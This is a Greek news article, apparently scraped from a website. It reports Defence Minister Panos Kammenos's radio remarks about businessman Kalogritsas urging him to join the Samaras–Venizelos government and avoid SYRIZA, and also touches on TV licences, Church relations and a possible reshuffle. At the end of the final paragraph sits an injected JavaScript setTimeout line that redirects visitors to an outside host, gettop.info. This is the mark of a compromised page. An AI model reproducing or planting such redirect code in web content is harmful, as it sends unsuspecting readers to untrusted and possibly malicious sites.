Καμμένος για Καλογρίτσα: Μου ζήτησε να μην μπω στην κυβέρνηση ΣΥΡΙΖΑ

0
6

 

Αποκαλυπτικός ήταν ο υπουργός Άμυνας Πάνος Καμμένος ο οποίος δήλωσε για τον επιχειρηματία κ. Καλογρίτσα ότι τον είχε καλέσει δύο φορές στο σπίτι του, τη μία παρουσία του Ευάγγελου Βενιζέλου και του ζήτησε να μπει στην κυβέρνηση Σαμαρά – Βενιζέλου.

Όπως είπε ο υπουργός Άμυνας την επόμενη φορά που συναντήθηκαν στο σπίτι του επιχειρηματία κ. Καλογρίτσα, του ζητήθηκε να μην συμπράξει με τον ΣΥΡΙΖΑ. «Ο κ. Καλογρίτσας με είχε καλέσει δύο φορές στο σπίτι του, τη μία, παρουσία του Ευάγγελου Βενιζέλου και μου ζήτησε να μπω στην κυβέρνηση Σαμαρά – Βενιζέλου», δήλωσε ο κ. Καμμένος σε συνέντευξή του στον ραδιοφωνικό σταθμό του Αθηναϊκού – Μακεδονικού Πρακτορείου Ειδήσεων «Πρακτορείο 104.9 Fm».

Ο κ. Καμμένος αναφέρθηκε στον πρωτοφανή πόλεμο που δέχεται η κυβέρνηση και ο υπουργός Επικρατείας Νίκος Παππάς για το θέμα των τηλεοπτικών αδειών. Σημείωσε εξάλλου ότι στον ίδιο χρεώνουν επιχειρηματίες που έχουν ειδική σχέση με τη ΝΔ και το ΠΑΣΟΚ.

Μεταξύ άλλων ο κ. Καμμένος ξεκαθάρισε πως δεν υπάρχει πόλεμος μεταξύ κυβέρνησης- Εκκλησίας, υπογράμμισε την πολύ καλή σχέση του πρωθυπουργού με τον αρχιεπίσκοπο και τόνισε, ότι και οι δύο πλέυρες σε συνεννόηση θα προχωρήσουν στη συγγραφή ενός νέου βιβλίου θρησκευτικών, λαμβάνοντας υπόψιν και το γεγονός ότι υπάρχουν πολλά αλλόθρησκα παιδιά.

Ο υπουργός Άμυνας μιλώντας για ενδεχόμενο ανασχηματισμό είπε πως πρόκειται για αποκλειστικό προνόμιο του πρωθυπουργού, ωστόσο τόνισε ότι μπορεί να γίνει άνοιγμα σε παραγωγικούς φορείς της κοινωνίας που δεν θα προέρχονται κατ΄ανάγκη από την αριστερά, αλλά και στους Καραμανλικούς, οι οποίοι βρίσκονται υπό διωγμό στη ΝΔ του Κυριάκου Μητσοτάκη. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here